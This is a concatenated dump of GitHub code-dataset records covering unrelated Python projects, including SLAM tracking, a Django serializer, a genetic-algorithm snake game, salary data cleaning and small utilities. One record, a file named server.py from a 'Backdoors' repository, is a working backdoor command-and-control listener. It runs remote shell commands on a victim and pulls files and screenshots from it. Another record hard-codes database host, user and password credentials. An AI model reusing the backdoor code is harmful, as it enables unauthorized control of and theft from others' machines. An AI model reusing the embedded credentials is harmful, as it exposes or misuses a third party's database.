done\n","repo_name":"rayaneberrada/OFF-Tkinter-API","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":16172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27816824925","text":"# Sort library\nfrom operator import itemgetter\n\nqolang_export = {\n \"sortonelist\": \"sort\",\n \"sortonelistr\": \"sortr\",\n \"sorttwolists\": \"sortbyval\",\n \"sorttwolistsr\": \"sortbyvalr\",\n}\n\ndef sortonelist(Variables, args):\n \"\"\"\n Sort a list.\n \"\"\"\n return (Variables, args[0].sort())\n\ndef sortonelistr(Variables, args):\n \"\"\"\n Sort a list, reversed.\n \"\"\"\n return (Variables, args[0].sort(reverse=True))\n\ndef sorttwolists(Variables, args):\n \"\"\"\n Sort two lists by the values of the second list.\n \"\"\"\n i = 0\n ddict = dict()\n for var in args[1]:\n ddict[var] = args[0][i]\n i += 1\n ddict = {k: v for k, v in sorted(ddict.items(), key=lambda item: item[0])}\n return (Variables, [ddict.keys(), ddict.values()])\n\ndef sorttwolistsr(Variables, args):\n \"\"\"\n Sort two lists by the values of the second list, reversed.\n \"\"\"\n i = 0\n ddict = dict()\n for var in args[1]:\n ddict[var] = args[0][i]\n i += 1\n ddict = {k: v for k, v in sorted(ddict.items(), key=lambda item: item[0], reverse=True)}\n return (Variables, [list(ddict.values()), list(ddict.keys())])\n","repo_name":"Camroku/Camlog","sub_path":"src/lib/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"74533852525","text":"#!/usr/bin/env python3\n\nimport time\nimport collections\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2 as cv\nimport pyrealsense2 as rs\nimport open3d\n\nfrom rigid_transform import rigid_transform_3D\n\n#np.seterr(all='raise')\nnp.set_printoptions(precision=3)\nnp.set_printoptions(suppress=True)\n\n\ncolormap = np.int32(plt.cm.jet(np.linspace(0,1,256)) * 255)\ndef 
depth_to_color(d):\n dmin = 1.0 # if d is here, then ii should be 255.0\n dmax = 9.0 # if d is here, then ii should be 0.0\n\n m = -255.0 / (dmax - dmin);\n b = 255 - (m * dmin);\n\n ii = m*d + b;\n\n i = int(round(ii))\n if i < 0:\n i = 0\n elif i > 255:\n i = 255;\n\n # OpenCV is in BGR order\n return int(colormap[i][2]), int(colormap[i][1]), int(colormap[i][0])\n\n\n\nlk_params = {\n 'winSize': (15, 15),\n 'maxLevel': 4,\n 'criteria': (cv.TERM_CRITERIA_EPS | cv.TERM_CRITERIA_COUNT, 10, 0.03)\n}\n\nfeature_params = {\n 'maxCorners': 500,\n 'qualityLevel': 0.04, # originally 0.3\n 'minDistance': 7,\n 'blockSize': 7\n}\n\n\n#track_len = 30\ntrack_len = 130\ndetect_interval = 3\nframe_idx = 0;\ntracks = []\n\npermanent_cloud_points = [] # np.zeros((1,3))\nhaveInitialWorldMap = False\n\nnotAddedYet = True\nprev_gray = None\n\n\npipeline = rs.pipeline()\nconfig = rs.config()\n\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\nconfig.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n#config.enable_device_from_file(sys.argv[1], repeat_playback=False)\n\nprofile = pipeline.start(config)\n\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\n\nrgb_stream = profile.get_stream(rs.stream.color)\nrgb_stream_profile = rs.video_stream_profile(rgb_stream)\nrgb_intrinsics = rgb_stream_profile.get_intrinsics()\n\nw_minus_1 = rgb_intrinsics.width - 1\nh_minus_1 = rgb_intrinsics.height - 1\n\nalign = rs.align(rs.stream.color)\n\n\nclass Track(collections.deque):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.realWorldPointIdx = None # index of real-world 3-D point\n self.point_3d = None # current 3-D point in camera coordinates\n\n\nvis = open3d.visualization.Visualizer()\nvis.create_window(width=800, height=600, left=1100, top=50)\nvis2 = open3d.visualization.Visualizer()\nvis2.create_window(width=800, height=600, left=1100, top=150)\n\nperm_pcd = open3d.geometry.PointCloud()\n\n\npcd = open3d.geometry.PointCloud()\nprev_pcd = open3d.geometry.PointCloud()\n\ncur_points = np.zeros((1,3))\n\ndef update_point_cloud():\n global cur_points\n\n prev_points = cur_points\n prev_colors = np.tile( [0.5, 0, 0], (len(prev_points), 1))\n\n numPts = len(tracks)\n cur_points = np.empty((numPts, 3))\n cur_colors = np.tile( [0, 0.5, 0], (numPts, 1))\n\n for i, t in enumerate(tracks):\n cur_points[i] = t.point_3d\n\n prev_pcd.points = open3d.utility.Vector3dVector(prev_points)\n prev_pcd.colors = open3d.utility.Vector3dVector(prev_colors)\n pcd.points = open3d.utility.Vector3dVector(cur_points)\n pcd.colors = open3d.utility.Vector3dVector(cur_colors)\n\n#position = np.array((0,0,0,1))\nposition = np.array((0,0,0), np.float64)\ndirection = np.array((0,0,1), np.float64)\n\nwhile True:\n\n frames = pipeline.wait_for_frames()\n aligned_frames = align.process(frames)\n depth_frame = aligned_frames.get_depth_frame()\n color_frame = aligned_frames.get_color_frame()\n\n if not depth_frame or not color_frame:\n print(\"missing frame(s)\")\n continue\n\n imRGB = np.asanyarray(color_frame.get_data())\n imD = np.asanyarray(depth_frame.get_data())\n\n\n # We use grayscale for calculations:\n frame_gray = cv.cvtColor(imRGB, cv.COLOR_BGR2GRAY)\n\n if prev_gray is None:\n prev_gray = frame_gray.copy()\n\n if len(tracks):\n # The p0 vector is just the last point in each of the tracks items\n p0 = np.empty((len(tracks), 1, 2), np.float32)\n for i, t in enumerate(tracks):\n p0[i] = [t[-1]]\n\n # Forward tracking\n p1, _st, 
_err = cv.calcOpticalFlowPyrLK(prev_gray, frame_gray, p0, None, **lk_params)\n\n # Reverse tracking\n p0r, _st, _err = cv.calcOpticalFlowPyrLK(frame_gray, prev_gray, p1, None, **lk_params)\n\n new_tracks = []\n\n for i, p in enumerate(p0):\n x = p1[i][0][0]\n y = p1[i][0][1]\n xx = max(0, min(int(round(x)), w_minus_1))\n yy = max(0, min(int(round(y)), h_minus_1))\n d = cv.norm(p - p0r[i]) # TODO: perhaps this could be a single op in numpy?...\n z_depth = depth_scale * imD[yy, xx]\n if (d < 1.5) and (z_depth < 8.0) and (z_depth > 0.1):\n pt3d = rs.rs2_deproject_pixel_to_point(rgb_intrinsics, [x,y], z_depth)\n tracks[i].append( (x, y) )\n tracks[i].point_3d = np.array([pt3d[0], -pt3d[1], -pt3d[2]])\n #color = imRGB[yy, xx] / 255\n #tracks[-1].color = color\n new_tracks.append(tracks[i])\n\n z_color = depth_to_color(z_depth);\n cv.circle(imRGB, (x, y), 3, z_color, -1)\n\n tracks = new_tracks\n\n # Draw the green lines showing the tracks:\n cv.polylines(imRGB, [np.int32(tr) for tr in tracks], False, (0, 255, 0))\n\n\n if haveInitialWorldMap:\n # Find the tracks that are connected to permanent (real-world) 3D points\n activePermPoints = 0\n for t in tracks:\n if t.realWorldPointIdx is not None:\n activePermPoints += 1\n\n\n ###########\n # BEGIN: find the transform from world coordinates to current camera coordinates\n ###########\n if activePermPoints > 0:\n world_points = np.empty((activePermPoints, 3))\n current_points = np.empty((activePermPoints, 3))\n\n i = 0\n for t in tracks:\n if t.realWorldPointIdx is not None:\n world_points[i] = permanent_cloud_points[t.realWorldPointIdx]\n current_points[i] = t.point_3d\n i += 1\n\n R, tt, inv_R = rigid_transform_3D(world_points, current_points)\n print(tt)\n else:\n print(' * Lost tracking.')\n ###########\n # END: find the transform from world coordinates to current camera coordinates\n ###########\n\n\n ########################################\n # All tracks that are connected to permanent (real-world) 3D points\n # will be transformed back into real-world coordinates. 
New points will\n # be added to the world as-is, existing points will be averaged in \n # (running average)\n \n for i, t in enumerate(tracks):\n if t.realWorldPointIdx is not None:\n # Convert t.point_3d to world coordinates:\n w3d = np.dot(inv_R, t.point_3d - tt)\n # Running avg:\n permanent_cloud_points[t.realWorldPointIdx] *= 0.99\n permanent_cloud_points[t.realWorldPointIdx] += 0.01 * w3d\n # Find any new, stable tracks:\n if t.realWorldPointIdx is None and len(t) > 20: # seems stable, so add it to the permanent point cloud\n # Convert t.point_3d to world coordinates:\n w3d = np.dot(inv_R, t.point_3d - tt)\n # Attach to permanent_cloud_points:\n t.realWorldPointIdx = len(permanent_cloud_points)\n permanent_cloud_points.append(w3d)\n \n\n if not haveInitialWorldMap:\n if len(tracks) > 50:\n doIt = True\n for t in tracks[:35]:\n if len(t) < 30:\n doIt = False\n break\n if doIt:\n print(\"ready to make initial map\")\n for t in tracks:\n if len(t) > 20: # seems to be stable, so add it to the world map\n t.realWorldPointIdx = len(permanent_cloud_points)\n permanent_cloud_points.append(t.point_3d)\n\n perm_pcd.points = open3d.utility.Vector3dVector(permanent_cloud_points)\n pcp_colors = np.tile([0, 0.5, 0], (len(permanent_cloud_points), 1))\n perm_pcd.colors = open3d.utility.Vector3dVector(pcp_colors)\n vis2.add_geometry(perm_pcd)\n\n haveInitialWorldMap = True\n\n\n # Every once-in-while, we'll try to add new points to the list of\n # points that we're tracking:\n if frame_idx % detect_interval == 0:\n\n # we won't bother detecting near points that we're already tracking:\n mask = np.zeros_like(frame_gray)\n mask[:] = 255\n for track in tracks:\n xy = track[-1]\n cv.circle(mask, xy, 5, 0, -1)\n\n pNew = cv.goodFeaturesToTrack(frame_gray, mask=mask, **feature_params)\n if pNew is not None:\n for x, y in np.float32(pNew).reshape(-1, 2):\n xx = max(0, min(int(round(x)), w_minus_1))\n yy = max(0, min(int(round(y)), h_minus_1))\n z_depth = depth_scale * imD[yy, xx]\n if z_depth < 8.0 and z_depth > 0.1:\n tracks.append(Track(maxlen=track_len))\n tracks[-1].append( (x, y) )\n pt3d = rs.rs2_deproject_pixel_to_point(rgb_intrinsics, [x,y], z_depth)\n tracks[-1].point_3d = np.array([pt3d[0], -pt3d[1], -pt3d[2]])\n #color = imRGB[yy, xx]\n #tracks[-1].color = color\n\n frame_idx += 1\n prev_gray = frame_gray\n\n update_point_cloud()\n\n if notAddedYet and len(pcd.points) > 50 and len(prev_pcd.points) > 50:\n vis.add_geometry(pcd)\n vis.add_geometry(prev_pcd)\n notAddedYet = False\n\n vis.update_geometry()\n vis.poll_events()\n vis.update_renderer()\n\n perm_pcd.points = open3d.utility.Vector3dVector(permanent_cloud_points)\n pcp_colors = np.tile([0, 0.5, 0], (len(permanent_cloud_points), 1))\n perm_pcd.colors = open3d.utility.Vector3dVector(pcp_colors)\n vis2.update_geometry()\n vis2.poll_events()\n vis2.update_renderer()\n\n\n '''\n if len(prev_points) > 10:\n R, tt = rigid_transform_3D(prev_points, cur_points)\n position = np.dot(R, position) + tt\n distance = cv.norm(position[:3])\n direction = np.dot(R, direction)\n #print(direction, position, \"%.02f\" % (distance))\n #print(R, tt)\n print(position[:3], direction, \"%.02f\" % (distance), len(permanent_cloud_points))\n '''\n\n cv.imshow('lk_track', imRGB)\n cv.moveWindow('lk_track', 20, 20)\n 
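# cv.waitKey(1) below also services the HighGUI event loop; without it the\n    # imshow window would never repaint even though frame processing continues.\n    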
cv.waitKey(1)\n\n\n\n","repo_name":"magnusoy/Sparkie","sub_path":"python/src/deprecated/slam/odoslam/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10791,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"2"}
+{"seq_id":"25236765224","text":"from rest_framework import serializers\nfrom .models import Team\n\nclass TeamSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Team\n        fields = [\n            'name',\n            'image',\n            'city',\n            'sport',\n        ]\n\n    def validate_name(self, value):\n        qs = Team.objects.filter(name__iexact=value)\n        if self.instance:\n            qs = qs.exclude(pk=self.instance.pk)\n        if qs.exists():\n            raise serializers.ValidationError(\"Team already exists.\")\n        return value","repo_name":"ViishalTyagi/SportsTeamManager","sub_path":"teams/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12997394424","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport socket\nimport base64\n\ndef shell():\n\tcurrent_dir = target.recv(1024)\n\tcount = 0\n\twhile True:\n\t\t# Show the shell prompt with the remote current directory\n\t\tcomando = raw_input(\"{}~#: \".format(current_dir))\n\t\t# On \"exit\", forward the command and break out of the loop\n\t\tif comando == \"exit\":\n\t\t\ttarget.send(comando)\n\t\t\tbreak\n\t\t# On \"cd\", forward the command and update the current-directory variable with the path we indicated\n\t\telif comando[:2] == \"cd\":\n\t\t\ttarget.send(comando)\n\t\t\tres = target.recv(1024)\n\t\t\tcurrent_dir = res\n\t\t# On empty input (e.g. a bare Enter), keep the loop running\n\t\telif comando == \"\":\n\t\t\tpass\n\t\t# On \"download\", create a file with the same name as the one being downloaded and write the Base64-decoded data into it\n\t\telif comando[:8] == \"download\":\n\t\t\ttarget.send(comando)\n\t\t\twith open(comando[9:], 'wb') as file_download:\n\t\t\t\tdatos = target.recv(30000)\n\t\t\t\tfile_download.write(base64.b64decode(datos))\n\t\t# On \"upload\", perform the inverse of the download procedure.\n\t\telif comando[:6] == \"upload\":\n\t\t\ttry:\n\t\t\t\ttarget.send(comando)\n\t\t\t\twith open(comando[7:], 'rb') as file_upload:\n\t\t\t\t\ttarget.send(base64.b64encode(file_upload.read()))\n\t\t\texcept:\n\t\t\t\tprint(\"A problem occurred during the upload\")\n\t\telif comando[:10] == \"screenshot\":\n\t\t\ttarget.send(comando)\n\t\t\twith open(\"monitor-%d.png\" % count, 'wb') as screen:\n\t\t\t\tdatos = target.recv(1000000)\n\t\t\t\tdata_decode = base64.b64decode(datos)\n\t\t\t\tif data_decode == \"fail\":\n\t\t\t\t\tprint(\"The screenshot could not be taken\")\n\t\t\t\telse:\n\t\t\t\t\tscreen.write(data_decode)\n\t\t\t\t\tprint(\"Screenshot saved\")\n\t\t\t\t\tcount = count+1\n\t\telse:\n\t\t\ttarget.send(comando)\n\t\t\tres = target.recv(30000)\n\t\t\t# Receive the \"1\" sent from the client and continue the loop\n\t\t\tif res == \"1\":\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tprint(res)\n\ndef upserver():\n\tglobal server\n\tglobal ip\n\tglobal target\n\t\n\t# AF_INET for IPv4 and SOCK_STREAM for TCP\n\tserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\t# Bind and listen on the given IP and port\n\tserver.bind(('192.168.1.110',7777))\n\tserver.listen(1)\n\t\n\tprint(\"Server running and waiting for connections...\")\n\t\n\ttarget, ip = server.accept()\n\tprint(\"Connection received from: \" + str(ip[0]))\n\nupserver()\nshell()\nserver.close()","repo_name":"atomarxculo/Backdoors","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"23797881615","text":"# -*- coding: utf-8 -*-\nimport pymysql\nfrom datetime import datetime,timedelta\nimport requests\nimport re\n\nclass load_model():\n    def __init__(self):\n        self.model_name = 'cluster_abstract_model'\n        self.model_version = '1.0'\n        self.opinion_service_url = 'http://120.79.228.104:16006/get_news_opinions'\n\n    def process(self, input_json):\n        conn,cursor = self.connect_to_database()\n        content_id_list = input_json.get('content_id_list')\n        content_id_str = str([content_id_list])\n\n        cluster_abstract = self.get_cluster_abstract(content_id_str)\n\n        output_dict = dict()\n        output_dict['cluster_abstract'] = cluster_abstract\n        cursor.close()\n        conn.close()\n        return output_dict\n\n    def get_version(self):\n        return self.model_version\n\n    def get_name(self):\n        return self.model_name\n\n\n    def svc(self,url, input_dict):\n        response = requests.post(url=url, json=input_dict)\n        return response.json() if response.ok else False\n\n    def connect_to_database(self):\n        conn = pymysql.connect(\n            host='rm-wz9lh12zwnbo4b457.mysql.rds.aliyuncs.com',port=3306,\n            user='melonfield',password='melonfield@DG_2020',\n            charset='utf8mb4')\n        cursor = conn.cursor()\n        return conn,cursor\n\n\n    def get_cluster_abstract(self,news_id_str):\n        input_dict = {\n            'news_ids': news_id_str\n        }\n        r = self.svc(self.opinion_service_url, input_dict)\n        if r:\n            return r['result'][0]\n        else:\n            return ''","repo_name":"XUXiangCUHK/pinhole","sub_path":"editor_api/cluster_abstract_model/model_interface.py","file_name":"model_interface.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"7193065758","text":"import pygame\nimport random\nimport time\nimport numpy as np\n\nimport Agent\nimport Brain\n\n# Random coordinates for the apple and snake-head spawn locations, restricted to the board width and height\nget_random_apple = lambda: [random.randrange(1,79)*15,random.randrange(6,39)*15]\nrandom_coordinate = lambda: [random.randrange(7,79)*15,random.randrange(6,39)*15]\n\n\nWIDTH = 1200\nHEIGHT = 600\n\nscreen = pygame.display.set_mode((WIDTH,HEIGHT))\nclock = pygame.time.Clock()\n\nclass Env:\n    \n    def __init__(self,Population_Number):\n        \n        \n        self.run = True\n        self.apple = get_random_apple()\n        self.Population = []\n        self.Population_Number = Population_Number\n        self.Died = []\n        self.Next_Generation = []\n        self.timer = time.time()\n        self.epoch = 1\n        \n        # Create agents, each with its own random initial weights\n        for i in range(self.Population_Number):\n            weights1 = np.random.uniform(-1,1,(3, 8))\n            weights2 = np.random.uniform(-1,1,(8, 4)) \n            self.Population.append(Agent.Agent(self.apple, weights1, weights2))\n        \n        \n        self.font = pygame.font.Font(None, 36)\n        self.text_surface = self.font.render(\"\", True, (255, 255, 255))\n        self.text_rect = self.text_surface.get_rect()\n        self.text_rect.center = (100, 40)\n    \n    \n    def check(self):\n        if len(self.Population) < 1: \n            self.crossover()\n            self.apple = get_random_apple()\n\n            for agent in self.Population:\n                agent.Fitness = 0\n                agent.head = random_coordinate()\n                agent.distance = np.linalg.norm(np.array(agent.head) - np.array(self.apple))\n    
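# Respawn the apple at a fresh random cell and refresh every agent's distance to it after a catch.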
\n    def eat_apple(self):\n        \n        self.apple = get_random_apple()\n        \n        for agent in self.Population:\n            agent.distance = np.linalg.norm(np.array(agent.head) - np.array(self.apple))\n    \n    \n    def step(self):\n        \n        pygame.draw.rect(screen, (252,0,0), [self.apple[0],self.apple[1], 15,15])\n        \n        for agent in self.Population:\n            \n            for pos in agent.tail:\n                pygame.draw.rect(screen, (0,0,120), [pos[0], pos[1], 15,15])\n            \n            distance = agent.distance\n            agent.move(self.apple)\n            \n            agent.tail.insert(0,list(agent.head))\n            agent.tail.pop()\n            \n            if agent.distance >= distance: # If the snake moves away from the apple (a wrong prediction), it dies\n                \n                self.Died.append(agent)\n                self.Population.remove(agent)\n                self.check()\n            \n            # The snake reached the apple: grow by one segment and respawn the apple\n            if self.apple == agent.head:\n                agent.tail.insert(0,list(agent.head))\n                self.eat_apple()\n    \n    \n    def crossover(self):\n        self.epoch += 1\n        self.Died = sorted(self.Died, key=lambda agent: agent.Fitness)\n\n        self.Next_Generation = []\n        last_best = int((self.Population_Number - 1) * 0.95)\n        self.Next_Generation.extend(self.Died[last_best:])\n        self.Besties = self.Died[last_best:]\n\n        self.Died.clear()\n        \n        while True:\n            if len(self.Next_Generation) < self.Population_Number:\n                member_1 = random.choice(self.Besties)\n                member_2 = random.choice(self.Besties)\n\n                member_1_weights_1 = member_1.network.weights1\n                member_1_weights_2 = member_1.network.weights2\n\n                member_2_weights_1 = member_2.network.weights1\n                member_2_weights_2 = member_2.network.weights2\n\n                child_weights_1 = []\n                child_weights_2 = []\n\n                for a,b in zip(member_1_weights_1, member_2_weights_1):\n                    for c,d in zip(a,b):\n                        prob = random.random()\n                        if prob < 0.47:\n                            child_weights_1.append(c)\n                        elif prob < 0.94:\n                            child_weights_1.append(d)\n                        else:\n                            child_weights_1.append(random.uniform(-1, 1))\n\n                for e,f in zip(member_1_weights_2, member_2_weights_2):\n                    for g,h in zip(e,f):\n                        prob = random.random()\n                        if prob < 0.47:\n                            child_weights_2.append(g)\n                        elif prob < 0.94:\n                            child_weights_2.append(h)\n                        else:\n                            child_weights_2.append(random.uniform(-1, 1))\n\n                child_weights_1 = np.array(child_weights_1).reshape(3,8)\n                child_weights_2 = np.array(child_weights_2).reshape(8,4)\n\n                self.Next_Generation.append(Agent.Agent(self.apple, child_weights_1, child_weights_2))\n\n            else:\n                break\n\n        self.Population = self.Next_Generation\n    \n    \n    def display(self):\n        try:\n            screen.fill((0,0,0))\n            self.drawGrid()\n            self.step()\n            self.text_surface = self.font.render(\"Generation / Nesil: \"+str(self.epoch), True, (255, 255, 255))\n            \n            screen.blit(self.text_surface, self.text_rect)\n            \n            for event in pygame.event.get():\n                if event.type == pygame.QUIT:\n                    self.run = False\n\n            pygame.display.update()\n            pygame.time.delay(10) # Optional delay \n\n        except Exception as e:\n            print(e)\n            self.run = False\n            pygame.quit()\n    \n    def drawGrid(self):\n        blockSize = 15 \n        for x in range(0, 1200, blockSize):\n            for y in range(75, 800, blockSize):\n                rect = pygame.Rect(x, y, blockSize, blockSize)\n                pygame.draw.rect(screen, (25,25,25), rect, 1)","repo_name":"RsGoksel/Genetic-Algorithm-Solutions","sub_path":"Game_Solutions/SnakeGame_Genetic/Environment.py","file_name":"Environment.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"40731636057","text":"# -*- coding:utf-8 -*-\nfrom PIL import Image\n\n# Create the image object for the first frame of the animation\nbefore = Image.open(\"user_image.jpg\")\n\n# Create the image object for the last frame of the animation\nafter = Image.open(\"seamlessclone.jpg\")\n\n# Create an (empty) list to hold the frames\nframes = []\n\n# Morph gradually from before to after\nfor a in range(0, 101, 4):\n\n    # Set how much of before and after to mix\n    alpha = a / 100\n\n    # Blend before and after at ratio alpha\n    blended_image = Image.blend(before, after, alpha)\n\n    # Append the blended image object to the list\n    frames.append(blended_image)\n\n# Create an (empty) list to hold the durations\nduration = []\n\n# Set a display duration for each frame\nfor i in range(len(frames)):\n    if i == 0 or i == len(frames) - 1:\n        # Show only the first and last frames for 2000 ms\n        duration.append(2000)\n    else:\n        # Show every other frame for 50 ms\n        duration.append(50)\n\n\n# Save as an animated GIF\nframes[0].save(\n    # File name\n    \"neko_anime.gif\",\n\n    # Save as an animation\n    save_all=True,\n\n    # List of images to include in the animation\n    append_images=frames[1:],\n\n    # Display time per frame (given as a list)\n    duration=duration,\n\n    # Play 3 times (a loop count of 2 means two extra repeats after the first play)\n    loop=2\n)","repo_name":"takumi4913/celeb_gan","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"42738954494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 18 20:27:12 2020\n\n@author: Rahul Khairnar\n\"\"\"\n\n# SALARY PARSING\n# COMPANY NAME TEXT ONLY\n# STATE FIELD SPLITTING\n# AGE OF THE COMPANY\n# PARSING OF JOB DESCRIPTION\n\n\nimport pandas as pd\nimport matplotlib as mpl\nfrom datetime import *\n\ntoday = datetime.now()\nyear = today.year\nprint(year)\n\ndf = pd.read_csv(\"actual data_glassdoors.csv\")\ndf.head()\n\ndf.shape\n\n## SALARY CLEANING ##\ndf[\"Per_Hour\"] = df[\"Salary Estimate\"].apply(lambda x:1 if \"per hour\" in x.lower() else 0)\ndf[\"Employer_provided\"] = df[\"Salary Estimate\"].apply(lambda x:1 if \"employer provided\" in x.lower() else 0)\n\ndf = df[df[\"Salary Estimate\"]!=\"-1\"]\n\nSalary = df[\"Salary Estimate\"].apply(lambda x: x.split('(')[0])\n\nstriped_salary = Salary.apply(lambda x: x.replace(\"K\",\"\").replace(\"$\",\"\")) \n\nSalary_minus_hr = striped_salary.apply(lambda x: x.lower().replace(\"per hour\",\"\").replace(\"employer provided salary:\",\"\"))\n\ndf[\"min_salary\"] = Salary_minus_hr.apply(lambda x: int(x.split(\"-\")[0]))\ndf[\"max_salary\"] = Salary_minus_hr.apply(lambda x: int(x.split(\"-\")[1]))\ndf[\"Avg_salary\"] = (df[\"min_salary\"]+df[\"max_salary\"])/2\n\n## SALARY CLEANING SUCCESSFUL ##\n\n## GETTING THE AGE OF THE COMPANY FROM ITS ESTABLISHMENT DATE\ndf[\"Age_of_company\"] = df[\"Founded\"].apply(lambda x: int(2020-x))\ndf[\"Age_of_company\"] = df[\"Age_of_company\"].replace(to_replace = 2021,value= -1)\n## GETTING AGE SUCCESSFUL ##\ndf[\"State\"] = df[\"Location\"].apply(lambda x: x.split(\",\")[1])\ndf[\"State\"].value_counts()\ndf[\"City\"] = df[\"Location\"].apply(lambda x: x.split(\",\")[0])\n\ndf[\"job_loc\"] = df.apply(lambda x: 1 if x.Location == x.Headquarters else 0, axis = 1)\n\ndf['Comp_Name'] = df.apply(lambda x: x['Company Name'] if x['Rating'] <0 else x['Company Name'][:-3], axis = 1)\n\n#### JOB DESCRIPTION PARSING: PYTHON, R, AWS, SPARK, EXCEL\ndf[\"Python\"] = df[\"Job Description\"].apply(lambda x: 1 if \"python\" in x.lower() else 0)\n# Flag R if the posting mentions either \"r studio\" or a standalone \" R \"\ndf[\"R_Studio\"] = df[\"Job Description\"].apply(lambda x: 1 if \"r studio\" in x.lower() or \" R \" in x else 0)\ndf[\"AWS\"] = df[\"Job Description\"].apply(lambda x: 1 if \"aws\" in x.lower() else 0)\ndf[\"SPARK\"] = df[\"Job Description\"].apply(lambda x: 1 if \"spark\" in x.lower() else 0)\ndf[\"EXCEL\"] = df[\"Job Description\"].apply(lambda x: 1 if \"excel\" in x.lower() else 0)\n\n## EXPORTING THE DF AS A CSV\nclean_data 
= df.drop(['Unnamed: 0'], axis=1)\nclean_data.to_csv(\"clean_data.csv\", index = False)\n","repo_name":"Rahul-Khairnar/Data-Scientist-Salary-Prediction","sub_path":"Data_Cleaning.py","file_name":"Data_Cleaning.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"71799720688","text":"#####################\n# CS 181, Spring 2016\n# Practical 1\n# Steven, Amelia, Wouter\n##################\n\n# Import necessary libraries\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# vars\narrays = []\n\n# functions\ndef readFile(filename, arrays): \n    with open(filename, 'r') as csv_fh:\n        # Read CSV file.\n        reader = csv.reader(csv_fh)\n        \n        # Get first row of names and add an array for each column \n        row1 = next(reader)\n        for col in row1:\n            arrays.append([])\n        \n        # Loop over the file. \n        for row in reader:\n            # Store the data.\n            x = 0 \n            for array in arrays:\n                array.append(float(row[x]))\n                x = x+1\n        \ndef saveFile(filename, arrays): \n    nFile = open(filename, 'wb')\n    csvFile = csv.writer(nFile)\n    csvFile.writerows(arrays)\n    nFile.close()\n    \n# Unit-test the functions \nreadFile('sample1.csv', arrays)\nsaveFile('outputTest.csv', np.transpose(arrays))","repo_name":"SRutherf/CS181-P1","sub_path":"csvIO.py","file_name":"csvIO.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"862309380","text":"from __future__ import annotations\n\n\nfrom datadog_api_client.model_utils import (\n    ModelSimple,\n    cached_property,\n)\n\n\nclass MetricBulkTagConfigEmailList(ModelSimple):\n    \"\"\"\n    A list of account emails to notify when the configuration is applied.\n\n\n    :type value: [str]\n    \"\"\"\n\n    @cached_property\n    def openapi_types(_):\n        return {\n            \"value\": ([str],),\n        }\n","repo_name":"DataDog/datadog-api-client-python","sub_path":"src/datadog_api_client/v2/model/metric_bulk_tag_config_email_list.py","file_name":"metric_bulk_tag_config_email_list.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"2"}
+{"seq_id":"24084802306","text":"result = 0\nnumero = int(input('Enter a number: '))\nbase = input('''\nWhich base do you want to convert to:\n1 - Binary\n2 - Hexadecimal\n3 - Octal\n: ''').strip().lower()[0]\n\nif base == '1':\n    result = bin(numero)[2:]\n    print(f'{numero}(BASE 10) = {result}(BASE 2)')\nelif base == '2':\n    result = hex(numero).upper()[2:]\n    print(f'{numero}(BASE 10) = {result}(BASE 16)')\nelif base == '3':\n    result = oct(numero)[2:]\n    print(f'{numero}(BASE 10) = {result}(BASE 8)')\nelse:\n    print('Invalid option')","repo_name":"EufranioDiogo/CursoEmVideoPythonExercicios","sub_path":"EXERCICIOS - MUNDO 2/Exerc002.py","file_name":"Exerc002.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"1423039964","text":"#!/usr/bin/env python3\n# Epidoc to csv converter\n# Brian Ballsun-Stanton\n# MIT License\n\nimport glob\nimport csv\nimport epidoc\nimport shutil\nimport os\nimport tqdm\nimport json\nimport numpy as np\nimport pandas as pd\n\nSOURCE_DIR = \"ISicily-ISicily-cf52385/inscriptions\"\nTARGET_DIR = \"output\"\n\n# clean target dir by deleting and recreating\nshutil.rmtree(TARGET_DIR, ignore_errors=True)\nos.mkdir(TARGET_DIR)\n\ndocs = []\n\n# get all files in source dir\nfor i, file in 
